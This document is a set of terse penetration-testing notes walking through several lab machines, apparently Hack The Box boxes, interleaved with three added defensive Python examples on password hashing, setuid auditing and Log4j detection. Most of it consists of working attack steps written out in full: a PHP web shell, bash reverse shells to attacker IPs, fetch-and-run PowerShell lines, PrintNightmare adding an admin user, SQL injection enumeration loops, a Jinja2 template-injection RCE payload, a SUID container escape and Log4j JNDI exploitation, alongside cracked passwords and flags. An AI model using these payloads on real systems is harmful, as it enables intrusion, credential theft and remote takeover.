# SUID exploitation which pkexec | xargs ls -l wget https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh cat pkwner.sh ; nano pkwner.sh from wordpress_xmlrpc.methods import media with open("pkwner.sh", "r") as f: filename = f.read() filename data_to_upload = {'name':'pkwner.png', 'bits': filename, 'type':'text/plain'} client.call(media.UploadFile(data_to_upload)) bash /var/www/html/wp-content/uploads/2022/02/pkwner.png pushd /var/www/html ; nano cmd.php ; <?php system($_REQUEST['cmd']); ?> ; popd service apache2 start ; service apache2 status ; localhost/cmd.php http://localhost/cmd.php?cmd=whoami ;

# TTY console vi ttyoverhttp.py python3 ttyoverhttp.py script /dev/null -c bash php --interactive cd /home ; mkdir pepe ; useradd pepe -d /home/pepe -s /bin/bash chown pepe:pepe pepe/ ; ls -l ; passwd pepe ; su pepe ; exit = ls -l /dev/shm cat /dev/shm/*output = evidence still there = rm -r /var/www/html/* echo hola > /var/www/html/test.txt # Docker docker pull ubuntu docker run -it ubuntu bash exit

#IPs [ DRIVE:10.10.11.106 ] #PING ping -c1 10.10.11.106 = ttl=127 = Windows

#NMAP nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.106 -oG allPorts nmap -sCV -p80,135,445,5985 10.10.11.106 -oN targeted

#Web info whatweb 10.10.11.106 -v WireShark = admin , admin curl -s -X GET -I 10.10.11.106

#Crackmapexec SMB crackmapexec smb 10.10.11.106 = domain:DRIVER ; Windows 10 Enterprise 10240 x64

#Network shares (null session) smbclient -L 10.10.11.106 -N = ACCESS_DENIED smbmap -H 10.10.11.106 -u 'null' = [!] Authentication error

#Virtual Hosting (support@driver.htb) nano /etc/hosts = 10.10.11.106 driver.htb www.driver.htb

#ShellCommandFile (upload malicious file) [pentestlab.blog] pushd /home/vleon/HTB/Drive/exploits ; rm * ; ls ; vi file.scf ; ...IconFile=\\10.10.15.8\smbFolder\pentestlab.ico... popd = to return to the previous directory

#Start an SMB service impacket-smbserver smbFolder $(pwd) -smb2support = submit file.scf = pass fly [Incoming connection (10.10.11.106,49555); AUTHENTICATE_MESSAGE (DRIVER\tony,DRIVER)] # Hash [NTLMv2] cd /content ; vi hash ; john --wordlist=/usr/share/wordlists/rockyou.txt hash = liltony (tony)

# Check valid crackmapexec smb 10.10.11.106 -u 'tony' -p 'liltony' = [+] DRIVER\tony:liltony [+ = OK] # Check WinRM crackmapexec winrm 10.10.11.106 -u 'tony' -p 'liltony' = [+] (Pwn3d!)

# Connect to the remote service [REMOTE MANAGEMENT USERS] evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony' = *Evil-WinRM* PS C:\Users\tony\Documents whoami = driver\tony ; ipconfig = 10.10.11.106 ; net user tony = Local Group Memberships *Remote Management Use*Users cd.. ; cd Desktop ; dir ; type user.txt ; d58fcbe6167b0b8f402ca71e796056e0; b671327af056d2926fce32dd0ffe6646 cd C:\Users\Administrator = PermissionDenied: ; C:\ whoami /priv ; C:\ whoami /all ; systeminfo = DENIED = reg query "hklm\software\microsoft\windows nt\currentversion" /v ProductName =

# PowerUp (dev branch, raw file) = wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1 ; vi PowerUp.ps1 = Invoke-AllChecks = python3 -m http.server 80 = C:\ IEX(New-Object Net.WebClient).downloadString('http://10.10.15.8/PowerUp.ps1') # WinPEAS cd C:\Windows\Temp ; mkdir Privesc ; cd Privesc ; upload /home/vleon/Descargas/winPEASx64.exe ; .\winPEASx64.exe # spoolsv wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 IEX(New-Object Net.WebClient).downloadString('http://10.10.15.8/CVE-2021-1675.ps1') Invoke-Nightmare -DriverName "Xerox" -NewUser "vleon" -NewPassword "vleon123$!" net user = Administrators = crackmapexec winrm 10.10.11.106 -u 'vleon' -p 'vleon123$!' = (Pwn3d!) evil-winrm -i 10.10.11.106 -u 'vleon' -p 'vleon123$!' ROOT FLAG = 2d423c4b5897360a8c6a186dd6ed3c7d

# IP ( Bolt: 10.10.11.114) # PING ping -c1 10.10.11.114 ping -c1 10.10.11.114 -R ttl=63 = LINUX

# NMAP - OPEN PORTS: nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.114 -oG allPorts Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https/// - PORT SERVICES: nmap -sCV -p22,80,443 10.10.11.114 -oN targeted 22 / OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 80 / nginx 1.18.0 / 443 / ssl / /auth/login?redirect=%2F / commonName=passbolt.bolt.htb [add DNS to /etc/hosts]

# Inspect the SSL certificate (443) openssl s_client -connect 10.10.11.114:443 # Investigate the web (http and https) whatweb 10.10.11.114 -v http://10.10.11.114 [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[example@company.com], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.114], JQuery, Meta-Author[Themesberg], Open-Graph-Protocol[website], Script, Title[Starter Website - About] [Title element contains newline(s)!], nginx[1.18.0] nmap --script http-enum -p80,443 10.10.11.114 -oN infoweb /admin/controlpanel.php: Possible admin folder [POSSIBLE ROUTES...] Download image.tar mv /home/vleon/Descargas/image.tar .

7z l image.tar = list the archive contents [/json ...] tar -xf image.tar = extract tree = view the contents as a tree tree -fas | grep "layer.tar" | awk 'NF{print $NF}' for file in $(tree -fas | grep "layer.tar" | awk 'NF{print $NF}'); do echo -e "\n[+] List content file $file"; done for file in $(tree -fas | grep "layer.tar" | awk 'NF{print $NF}'); do echo -e "\n[+] List content file $file"; 7z l $file; done | less -S

db.sqlite = ./a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar cd $(dirname ./a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar) tar -xf layer.tar ; ll ; file db.sqlite3 (check the magic number) ; sqlite3 db.sqlite3 (open the file); .tables , select * from User; = 1|admin|admin@bolt.htb|$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.|| vi hash = john --wordlist=/usr/share/wordlists/rockyou.txt hash = MD5 = deadbolt (?); /login = http://10.10.11.114/admin/home

# SSTI (Flask) = [HTTPS] https://passbolt.bolt.htb/ ; admin@bolt.htb requires an invitation. ; # Enumerate subdomains gobuster vhost -t 200 --url http://bolt.htb -w /home/vleon/Descargas/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Found: demo.bolt.htb (Status: 302) [Size: 219] Found: mail.bolt.htb (Status: 200) [Size: 4943] *ADD TO /etc/hosts http://demo.bolt.htb/login Invitation code = search by the input's ref "invite_code" = grep -r -i "invite_code" --text [in the demo] = cd $(dirname 41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad/layer.tar) tar -xf layer.tar ; cd app ; grep -r -i "invite_code" ; /routes.py = if code != 'XNSS-HSJW-3NGU-8XTJ': http://mail.bolt.htb/ test@bolt.htb ; test 7*7 in the Profile settings field = 49 It interprets the template and sends an e-mail

PayloadsAllTheThings = self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() = uid=33(www-data) gid=33(www-data) groups=33(www-data) = vi index.html (#!/bin/bash , bash -i >& /dev/tcp/10.10.15.54/443 0>&1) ; python3 -m http.server 80 ; nc -nlvp 443 = hostname -I = 10.10.11.114

# TTY treatment script /dev/null -c bash ; stty raw -echo; fg ; reset xterm ; echo $TERM ; export TERM=xterm ; echo $SHELL = bash ; stty size ; stty rows 56 columns 238

# Escalation [LinPEAS] linpeas.sh = python3 -m http.server 80 = which wget ; cd /tmp ; wget http://10.10.15.54/linpeas.sh ; chmod +x linpeas.sh ; ./linpeas.sh ;

#MySQL mysql -upassbolt -p su eddie : rT2;jW7eY8dX8pQ8 cd ; ls ; cat user.txt = 812a2e0863a46d39cd5a4c1d8d6b8796 PGP PRIVATE KEY = to UNlock PGP Public key = merrychristmas gpg --import private.key ; gpg -d mesg.crypted = pass : merrychristmas = ROOT PASS = Z(2rmxsNW(Z?3=p/9s = su root ; cd /root/ ; flag= 071117d163659c16d4ae41c446d94479

#IPs ( GG: 10.10.11.130; ) #PING ping -c1 10.10.11.130 ttl=63 = LINUX ping -c1 10.10.11.130 -R echo $PATH

#NMAP (65535 ports) TCP protocol nmap -p- --open -T5 -v -n 10.10.11.130 (pressing Enter shows the scan speed) nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.130 -oG allPorts = Ports: 80/open/tcp//http/// nmap -sCV -p80 10.10.11.130 -oN targeted = PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.51 |_http-title: GoodGames | Community and Store |_http-server-header: Werkzeug/2.0.2 Python/3.9.2 Service Info: Host: goodgames.htb nmap --script http-enum -p80 10.10.11.130 -oN infoweb

# whatweb 10.10.11.130 http://10.10.11.130 [200 OK] Bootstrap, Country[RESERVED][ZZ], Frame, HTML5, HTTPServer[Werkzeug/2.0.2 Python/3.9.2], IP[10.10.11.130], JQuery, Meta-Author[_nK], PasswordField[password], Python[3.9.2], Script, Title[GoodGames | Community and Store], Werkzeug[2.0.2], X-UA-Compatible[IE=edge]

#Curl curl -s -X GET -I 10.10.11.130 [VIEW THE WEB HEADERS]

#Investigate in the browser: Flask web server # SQL injection test@test' or 1=1-- -

# Burpsuite (PROXY) burpsuite &>/dev/null & [RUN SEPARATELY] disown [DETACH THE PROCESS] FoxyProxy = BurpSuite (Proxy/Repeater(req,res) = inject ' or 1=1-- - [See Content-Length: 9267]) Send the injection = email=test@test.com' or 1=1-- -&password=test = [Content-Length : 9347] DONE! + Set-cookie: session= .eJw1yz0... + Login Successful + Welcome admin Intercept "' or 1=1-- -" = Forward = Logged in (admin profile) = http://10.10.11.130/profile Config panel = http://internal-administration.goodgames.htb/ [VIRTUAL HOSTING] = add to /etc/hosts ping -c1 goodgames.htb = Nombre o servicio desconocido ping -c1 internal-administration.goodgames.htb = Nombre o servicio desconocido = redirect http://internal-administration.goodgames.htb/login [NO CREDENTIALS]

# Enumerate databases (find the column count)
email=test%40test.com' order by 100-- -&password=test = Content-Length: 33490
' order by 4-- - = Content-Length: 9267 DONE!
' union select 1,2,3,4-- - = Welcome 4
' union select 1,2,3,"test"-- - = Welcome test [RESPONSE]

# Test SSTI (server-side template injection)
' union select 1,2,3,"7*7"-- - = [NOT INTERPRETED]
' union select 1,2,3,database()-- - = current database = Welcome main
' union select 1,2,3,schema_name from information_schema.schemata-- - = DB names

# Enumerate the "main" database
' union select 1,2,3,table_name from information_schema.tables-- - = ADMIN_ROLE......
... table_name from information_schema.tables limit 0,1-- - = Welcome ADMINISTRABLE_ROLE_AUTHORIZATIONS

# Organize the data from the database
curl -s -X POST http://10.10.11.130/login --data "email=test%40test.com' union select 1,2,3,table_name from information_schema.tables limit 0,1-- -&password=test"
# Filter the Welcome field
| grep "Welcome" | sed 's/^ *//' | awk '{print $NF}' | awk '{print $1}' FS="<"
# Set up the loop
for i in $(seq 0 100); do echo "[+] For $i:" <query> "curl ... limit $i,1"; done
= FINAL QUERY =
for i in $(seq 0 100); do echo "[+] For $i: $(curl -s -X POST http://10.10.11.130/login --data "email=test%40test.com' union select 1,2,3,table_name from information_schema.tables limit $i,1-- -&password=test" | grep "Welcome" | sed 's/^ *//' | awk '{print $NF}' | awk '{print $1}' FS="<")"; done
= ...information_schema.tables where table_schema=\"main\" limit... = enumerate main

# user, blog, blog_comments (enumerate columns)
...union select 1,2,3,column_name from information_schema.columns where table_schema=\"main\" and table_name=\"user\"... = id,email,password,name
...' union select 1,2,3,group_concat(name,0x3a,email,0x3a,password) from user limit ... = admin:admin@goodgames.htb:2b22337f218b2d82dfc3b6f77e7cb8ec + other users

# Identify the password hash
hash id 2b22337f218b2d82dfc3b6f77e7cb8ec
hash-identifier ; 2b22337f218b2d82dfc3b6f77e7cb8ec = MD5
echo -n "2b22337f218b2d82dfc3b6f77e7cb8ec" | wc -c = 32 chars (YES)
python -c 'import hashlib; print(hashlib.md5("azdfgzdfgbzdrfgdrfljyhgdyhm").hexdigest())' = 32

# Crack the hash (crackstation also works)
vi hash = 2b22337f218b2d82dfc3b6f77e7cb8ec = i ; :wq
gzip -d rockyou.txt.gz = [+ decompressors]
john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=Raw-MD5 = superadministrator (?)
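The hash falls to a wordlist in seconds because the application stores a single unsalted MD5 per password. As an added example (not from these notes), the block below shows the two sides of that: a wordlist lookup against unsalted MD5, and a stdlib-only replacement (PBKDF2-HMAC-SHA256 with a random salt and an iteration count) that gives every user a distinct, slow-to-test record. The wordlist and passwords are constructed.

```python
import hashlib
import hmac
import os


def md5_hex(text):
    """Unsalted MD5, the form the application in the notes stores (constructed helper)."""
    return hashlib.md5(text.encode()).hexdigest()


def wordlist_lookup(target_hex, wordlist):
    """Why unsalted MD5 falls to rockyou: one fast hash per candidate, and with no salt
    the same candidate hashes (or a precomputed table) serve every account in the dump."""
    for candidate in wordlist:
        if md5_hex(candidate) == target_hex:
            return candidate
    return None


def hash_password(password, iterations=200_000):
    """Defensive form with the stdlib only: PBKDF2-HMAC-SHA256, a random 16-byte salt
    and a tunable work factor. Stored as pbkdf2_sha256$<iters>$<salt hex>$<hash hex>."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Constructed mini wordlist; rockyou.txt plays this role in the notes.
    wordlist = ["123456", "password", "superadministrator"]
    print("MD5 lookup:", wordlist_lookup(md5_hex("superadministrator"), wordlist))
    stored = hash_password("superadministrator")
    print("PBKDF2 record:", stored)
    print("verify right / wrong:", verify_password("superadministrator", stored),
          verify_password("superadministrator", hash_password("other")))
```

Two records for the same password differ because of the salt, so a leaked table cannot be attacked with one precomputed list, and each guess costs the full iteration count.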

# Admin panel = http://internal-administration.goodgames.htb/index
LOOK FOR SSTI (responses the server interprets) 7*7 = http://internal-administration.goodgames.htb/settings = 49

# Hacker bible (PayloadsAllTheThings) = https://github.com/swisskyrepo/PayloadsAllTheThings
Filter by SSTI = Jinja2 = Remote Code Execution
self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() = uid=0(root) gid=0(root) groups=0(root)
= replace 'id' to run commands, e.g. hostname -I = 172.19.0.2 [container]

# Validate traces
tcpdump -i tun0 icmp -n = listens on my tun0 interface
'id' = ping -c1 10.10.14.247 [YES, tcpdump shows: IP 10.10.11.130 > 10.10.14.247: ICMP echo request]

# Connect an interactive console
Create index.html (vi index.html):
  #!/bin/bash
  bash -i >& /dev/tcp/10.10.14.247/443 0>&1
Share it with python = python3 -m http.server 80 = http://localhost:80
Listen on the assigned port = nc -nlvp 443
From the SSTI on the victim = ('curl 10.10.14.247') = shows the script; pipe it with | bash = bash interprets it and sends the shell back over Netcat on the given port

# TTY treatment
script /dev/null -c bash
Ctrl+z
stty raw -echo; fg
reset xterm
echo $TERM ; export TERM=xterm ; echo $SHELL = bash
stty size ; stty rows 56 columns 238

# Victim container [172.19.0.2]
hostname -I ; whoami ; route -n [172.19.0.1 = GATEWAY] ; ping -c 1 172.19.0.1
User flag : /home/augustus/user.txt = 4bfd53f2e2cf0ee85c39a875afb4f291
ls -l ; grep "augustus" /etc/passwd ; grep "sh$" /etc/passwd ; cat /etc/group
mount | grep home = /dev/sda1 on /home/augustus
fdisk -l ; which fdisk ; df -h

# Check the open ports of the GG host from the container
*Bash script*
cd /tmp ; echo '' > /dev/tcp/172.19.0.1/80 ; echo $? = exit code 0 [Y], 1 [N]
(echo '' > /dev/tcp/172.19.0.1/81) 2>/dev/null = 1
*Seq*
for port in $(seq 1 65535); do ... done; wait
(echo '' > /dev/tcp/172.19.0.1/80) 2>/dev/null && echo "[+] Port open" || echo "[-] Port closed"
Command time limit: timeout 1 bash -c
vi portScan.sh (SEE THE CODE IN GG/content)
base64 -w 0 portScan.sh | xclip -sel clip = paste into the container = echo <string> | base64 -d > portScan.sh
chmod +x portScan.sh ; ./portScan.sh = port 22 open [new port discovered]

# SSH port (22) [credential reuse]
ssh augustus@172.19.0.1 password: superadministrator = augustus@GoodGames:~$
hostname -I = 10.10.11.130
Augustus flag : 4bfd53f2e2cf0ee85c39a875afb4f291

# Privilege escalation
Which system? uname -a ; lsb_release -a
SUID privileges = find / -perm -4000 2>/dev/null
Cron jobs = cat /etc/crontab
Extend PATH = echo $PATH ; export PATH=/root/...
Check capabilities = which getcap ; getcap -r / 2>/dev/null = only ping
cd /home/augustus ; cp /bin/bash . ; ls -l
Go back to the container where the host's /home is mounted = exit
cd /home/augustus = from the container as ROOT = ls ; chown root:root bash
Assign SUID to bash = chmod 4755 bash
Back to ssh augustus = ./bash -p ; whoami = root
cd / ; cd root ; cat root.txt = ROOT FLAG = c682307c4267caea83431507bad0819c
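The root step works because a bind mount shares `/home/augustus` between the container (where the attacker is root) and the host, so a setuid root copy of bash dropped there is honoured on the host. The audit a defender would run is the `find / -perm -4000` from the notes with a baseline: the block below is an added example (not from these notes) that walks a tree, reports setuid regular files outside an allowlist, and demonstrates itself on a constructed temporary directory holding a setuid "bash" next to a plain file. The baseline paths in `main` are an assumption for a stock Debian/Ubuntu host.

```python
import os
import stat
import tempfile


def find_suid_files(root, allowlist=frozenset()):
    """Walk `root` (symlinks are not followed) and return (path, owner uid) for every
    regular file carrying the setuid bit whose path is not in `allowlist`.
    Unreadable entries are skipped so one permission error does not stop the audit."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and path not in allowlist:
                found.append((path, st.st_uid))
    return found


def demo_audit():
    """Constructed demo: a temporary tree holding a setuid "bash" (the copied shell
    from the notes) next to a plain file. Returns the basenames the audit flags."""
    with tempfile.TemporaryDirectory() as tmp:
        suid_copy = os.path.join(tmp, "bash")
        plain = os.path.join(tmp, "user.txt")
        for path in (suid_copy, plain):
            with open(path, "w") as fh:
                fh.write("constructed\n")
        os.chmod(suid_copy, 0o4755)   # what "chown root:root bash; chmod 4755 bash" leaves behind
        os.chmod(plain, 0o644)
        return sorted(os.path.basename(p) for p, _uid in find_suid_files(tmp))


if __name__ == "__main__":
    # Assumed baseline for a stock Debian/Ubuntu host; build the real one from a clean
    # image of your own system rather than trusting this list.
    baseline = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
                "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
                "/usr/bin/newgrp"}
    for path, uid in find_suid_files("/", baseline):
        print("unexpected setuid file: %s (owner uid %d)" % (path, uid))
```

Anything the audit reports under a user home or a path shared with a container is the finding that matters; the structural fix is mounting such shared paths with `nosuid` (the kernel then ignores setuid bits there), which would have left the copied bash inert.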

# Reconnaissance ( NMAP = nmap -sC -sV -Pn -d 10.129.155.168 )
21/tcp - FTP
22/tcp - SSH
80/tcp - HTTP

# Directory enumeration ( gobuster dir -w /usr/share/wordlists/dirb/common.txt -u 10.129.155.168 )

# FTP ( ftp 10.129.155.168 ; anonymous ; ls,get )

# Unzip ( unzip backup.zip )
zip2john backup.zip > hash ; cat hash
cp /usr/share/wordlists/rockyou.txt.gz rockyou.txt.gz ; gzip -d rockyou.txt.gz

john hash --fork=4 -w=rockyou.txt = 741852963 (backup.zip)
# hashcat - md5sum or ( https://crackstation.net/ )
cat index.php = admin hash result: qwerty789

# GET request ( http://10.129.155.168/dashboard.php?search=a )
PHPSESSID - poqfu50r0d7hsnqleee6ecj59l ( inspect / storage )
sqlmap -u 'http://10.129.155.168/dashboard.php?search=a' --cookie="PHPSESSID=dok94i8oqj326aa4e8bqg8s4an"
sqlmap -u 'http://10.129.155.168/dashboard.php?search=a' --cookie="PHPSESSID=chov3p3iln4rk6jcsb1tugubsn" --os-shell
whoami = postgres

# Spawn shell
nc -lvnp 4444
os-shell> bash -c 'bash -i >& /dev/tcp/10.10.15.251/4444 0>&1'
SHELL=/bin/bash script -q /dev/null

# Python shell
python3 -c "import pty;pty.spawn('/bin/bash')"
sudo -l

# Vi editor
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:!/bin/bash

# Find the database
cd www/html ; cat dashboard.php = dbname=carsdb user=postgres password=P@s5w0rd!
# Admin flag dd6e058e814260bc70e9bbdef2715849
# User flag ec9b13ca4d6229cd5cc1e09980965bf7

# ping -c1 10.129.44.34 = ttl=62 = Linux

# nmap -sC -sV -Pn -n 10.129.150.98
Open ports = 22 ssh, 6789 ibm-db2-admin?, 8080 http-proxy, 8443 https [ssl/nagios-nsca]

# TLS = https://10.129.150.98:8443/manage/account/login?redirect=%2Fmanage

# Hostname = sudo nano /etc/hosts = ip "alias"

# BurpSuite = POST /api/login "remember":"${jndi:ldap://10.10.14.153:389}"
sudo tcpdump -i tun0 port 389
sudo apt-get install maven
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi ; mvn package ; mvn -v

Apache Maven, JNDI, Wireshark
echo 'bash -c bash -i >& /dev/tcp/Your IP Address/A port of your choice 0>&1' | base64
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,BASE64 STRING HERE}|{base64,-d}|{bash,-i}" --hostname "YOUR TUN0 IP ADDRESS"
${jndi:ldap://10.10.14.153:1389/o=tomcat}
nc -lvnp 4444
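The `tcpdump -i tun0 port 389` above confirms the vulnerable Log4j instance reaches out to whatever host the `remember` field names; on the defending side the same request is visible in the application's own logs before any callback happens. The block below is an added example (not from these notes or from the UniFi or Log4j projects): a detector that flags JNDI lookups in request log lines, including the common lookup-nesting tricks (`${lower:j}`, `${::-j}`, `${env:X:-j}`) used to hide the literal string `jndi`. The log lines are constructed; only the endpoint, the field name and the IPs come from the notes.

```python
import re

# The cheapest Log4j lookup tricks used to hide the string "jndi" from pattern matching:
# ${lower:j} / ${upper:J} rewrite one character, and ${<anything>:-j} (e.g. ${::-j} or
# ${env:NOPE:-j}) is a lookup whose default value is the character itself.
_OBFUSCATION = re.compile(
    r"\$\{(?:lower|upper):([^}$]*)\}"      # ${lower:x} / ${upper:x}  -> x
    r"|\$\{[^}$]*:-([^}$]*)\}",            # ${...:-x}                -> x
    re.IGNORECASE,
)


def _unwrap_once(text):
    """Resolve every innermost obfuscating lookup one level."""
    return _OBFUSCATION.sub(
        lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)


def is_jndi_lookup(text):
    """True if the text, at any stage of de-obfuscation, contains a JNDI lookup
    (any scheme after the colon: ldap, ldaps, rmi, dns). The check runs before each
    unwrap step so a ":-" inside the lookup itself cannot make it disappear."""
    prev = None
    while prev != text:
        if "${jndi:" in text.lower():
            return True
        prev = text
        text = _unwrap_once(text)
    return "${jndi:" in text.lower()


def scan_lines(lines):
    """Return the indices of log lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


# Constructed request log for the POST /api/login endpoint from the notes; the JSON
# bodies are made up, "remember" is the field the notes abuse.
SAMPLE_LOG = [
    '10.10.14.153 "POST /api/login" {"username":"a","password":"b","remember":"true"}',
    '10.10.14.153 "POST /api/login" {"username":"a","password":"b","remember":"${jndi:ldap://10.10.14.153:389/o=tomcat}"}',
    '10.10.14.153 "POST /api/login" {"username":"a","password":"b","remember":"${${lower:j}ndi:ldap://10.10.14.153:1389/o=tomcat}"}',
    '10.10.14.153 "POST /api/login" {"username":"a","password":"b","remember":"${${::-j}${::-n}${::-d}${::-i}:ldap://10.10.14.153:1389/o=tomcat}"}',
    '10.10.14.153 "POST /api/login" {"username":"a","password":"b","remember":"${${env:NOPE:-j}ndi:rmi://10.10.14.153:1099/x}"}',
    '10.10.14.153 "GET /manage/account/login?redirect=%2Fmanage" -',
]

if __name__ == "__main__":
    for i in scan_lines(SAMPLE_LOG):
        print("JNDI lookup in line %d: %s" % (i, SAMPLE_LOG[i]))
```

Pattern matching is a detection aid, not the fix: the vulnerable Log4j version still has to be replaced, and the tcpdump capture on port 389 above (an outbound LDAP connection from the application host) is the network-side indicator that a lookup was actually evaluated.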

# Upgrade shell
script /dev/null -c bash
user flag : 6ced1a6a89e666c0620cdb10262ba127

ps aux | grep mongo
mongo --port 27117 ace
db.admin.find().forEach(printjson);

mkpasswd -m sha-512 Password1234 = $6$EthFWnL3mvUALirW$2S/gi4k2V4Vq80s1t4N/mqwFno3B3.8uZSoP8Uhwg4LetN3BaSEzsd4ljWAA0j1rip/ITcg9bAHjTH6i6DzMC0
mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$EthFWnL3mvUALirW$2S/gi4k2V4Vq80s1t4N/mqwFno3B3.8uZSoP8Uhwg4LetN3BaSEzsd4ljWAA0j1rip/ITcg9bAHjTH6i6DzMC0"}})'
https://10.129.44.34:8443/manage/site/default/dashboard

ssh root@10.129.44.34 - password from settings / site = NotACrackablePassword4U2022
root flag: e50bc93c75b634e4b272d2f771c33681

© All rights reserved.

2020 - 2025